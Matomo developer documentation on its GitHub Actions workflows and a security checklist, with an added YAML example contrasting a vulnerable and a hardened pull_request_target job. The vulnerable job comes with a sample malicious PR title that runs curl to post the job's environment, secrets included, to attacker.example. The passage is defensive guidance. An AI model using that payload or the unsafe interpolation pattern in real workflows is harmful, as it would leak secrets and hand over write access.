GitHub Actions are used to automate our software workflows, including running JavaScript builds, test suites, releases and code checks.
All GitHub Actions workflow files are located in .github/workflows/*.yml.
Each workflow is triggered by its own conditions; for more details see the GitHub Actions Docs.
Matomo uses GitHub Actions to automate some processes. Our current actions are listed below:
build js: triggered by posting the comment "build js" on a pull request. It compresses js/piwik.js into matomo.js and piwik.js and pushes the changes, provided the PR's branch is within the same repository (the workflow's token cannot push to a fork).
composer update: runs composer update and creates a PR for the available dependency updates.

To create a new GitHub Actions workflow, please read the Quickstart for GitHub Actions.
We recommend forking the Matomo project and running actions on your own pipeline first. Also, please check the following list before getting started:
Workflow scripts are an attack surface: a workflow that can be influenced by untrusted input may be hijacked, so security is of the utmost importance when you create a new GitHub Actions workflow.
A compromised workflow can leak the GITHUB_TOKEN (and any other secret the job can read) and hand an attacker write access to our code.
The most common attack is script injection: attacker-controlled values from the event payload, such as a pull request title, get expanded into a run step and executed by the shell. GitHub's "Security hardening for GitHub Actions" guide describes this and the countermeasures.
For more details, refer to that article.
Make sure that untrusted values from the event payload (the PR title and body, branch name, commit messages, issue comments, author names, etc.) are never expanded directly into a run step with ${{ }} and never used unquoted. Pass them to the script through an environment variable instead, so the shell receives them as data rather than as part of the command text.
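The difference between the two patterns, as an added example that is not one of Matomo's workflows: the first job shows the injection, the second the fix. The workflow name, the pull_request_target trigger and the malicious PR title are constructed for illustration; attacker.example is a reserved example domain, not a real host.

```yaml
# Added example (not Matomo's own workflow): script injection via a PR title.
# Constructed malicious PR title used for illustration:
#   a"; curl -d "$(env)" https://attacker.example/collect #
name: pr-title-check
on:
  pull_request_target:   # runs in the base repo with a write-capable token, on input the PR author controls
    types: [opened, edited]

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      # BAD: ${{ }} is substituted by the runner *before* bash parses the script,
      # so the title above becomes part of the command line:
      #   title="a"; curl -d "$(env)" https://attacker.example/collect #"
      # and the curl runs with every secret exported into the job environment.
      - run: |
          title="${{ github.event.pull_request.title }}"
          echo "Checking $title"

  hardened:
    runs-on: ubuntu-latest
    steps:
      # GOOD: the value reaches the shell as an environment variable. The shell
      # never re-parses the contents of a variable, and the double quotes keep
      # it a single word, so the title is printed, not executed.
      - env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "Checking $PR_TITLE"
          # Reject anything outside a conservative character set before using the
          # value further (e.g. in a commit message or a file name).
          printf '%s\n' "$PR_TITLE" | grep -Eq '^[A-Za-z0-9 ._#:()-]+$' \
            || { echo "unexpected characters in PR title"; exit 1; }
```

The same rule applies to every other field an outside contributor can set (github.event.pull_request.body, github.head_ref, github.event.comment.body, github.event.commits.*.message and so on): bind it to an env variable in the step, then reference the variable in the script.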
Do not store secrets such as tokens, passwords or other sensitive values in plain text in the workflow file or in JSON, XML, YAML (or similar) files committed to the repository. Use GitHub's encrypted repository secrets and reference them with ${{ secrets.NAME }}.
Generally the best practice is to avoid using a third-party GitHub Action or script when possible. For example, when the action only executes a few simple commands, we don't need an action for this and can run the commands ourselves, which reduces the security risk: every third-party action is code that runs with the job's token.
If you need to use an action from the marketplace, please ensure that it is either an official action provided by GitHub (the actions/ organisation) or that you have reviewed the action's code. In the latter case, pin it to a full-length commit SHA rather than a tag, because a tag can be moved to point at different code after your review.
We recommend using no permissions where possible (permissions: {} at the top level of the workflow), read permissions only where a job needs to read the value, and write only where it is genuinely needed. For more details see Permission syntax and Assigning permissions to jobs.
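How the items on this checklist fit together in one workflow, as an added example that is not one of Matomo's workflows: top-level permissions are removed, each job opts in to the minimum, the action is pinned by commit SHA, and the secret is read from the secrets store. The workflow name, the branch name, the label name, the test command and the SHA are placeholders chosen for illustration; the SHA in particular is not a real actions/checkout commit.

```yaml
# Added example (not Matomo's own workflow). The 40-zero SHA is a placeholder,
# not a real actions/checkout commit: replace it with the full SHA of the
# release you reviewed, and keep the version in the trailing comment so that
# dependency-update tooling and reviewers can see what it corresponds to.
name: tests
on:
  pull_request:
  push:
    branches: [5.x-dev]   # assumed branch name for illustration

# Default for every job: no permissions at all. Each job opts in to the minimum
# it needs, so a compromised step cannot push code, edit releases or read
# anything beyond what its own job declared.
permissions: {}

jobs:
  phpunit:
    runs-on: ubuntu-latest
    permissions:
      contents: read          # enough to check out the repository, nothing more
    steps:
      # Pinned to a full-length commit SHA rather than a mutable tag such as @v4:
      # a tag can be re-pointed at malicious code, a commit SHA cannot.
      - uses: actions/checkout@0000000000000000000000000000000000000000 # v4.x.x (placeholder SHA)
        with:
          persist-credentials: false   # don't leave the token in .git/config for later steps

      # Simple steps run as plain commands instead of through a marketplace
      # action, so there is no third-party code to review here.
      - run: composer install --no-interaction --prefer-dist
      - run: ./vendor/bin/phpunit   # assumed test command for illustration

  label:
    runs-on: ubuntu-latest
    needs: phpunit
    if: github.event_name == 'pull_request'
    permissions:
      pull-requests: write    # the only job that writes, and only to PR metadata
    steps:
      # The token comes from the secrets store, never from the workflow file, and
      # is passed through env rather than interpolated into the script text.
      # The "tests-passed" label is assumed to exist in the repository.
      - env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          PR_NUMBER: ${{ github.event.pull_request.number }}
        run: gh pr edit "$PR_NUMBER" --repo "$GITHUB_REPOSITORY" --add-label "tests-passed"
```

A quick check before merging a new workflow: for each job, list what the steps actually do with the token and delete every scope in permissions that no step uses; if the job only runs tests, contents: read is normally all it needs.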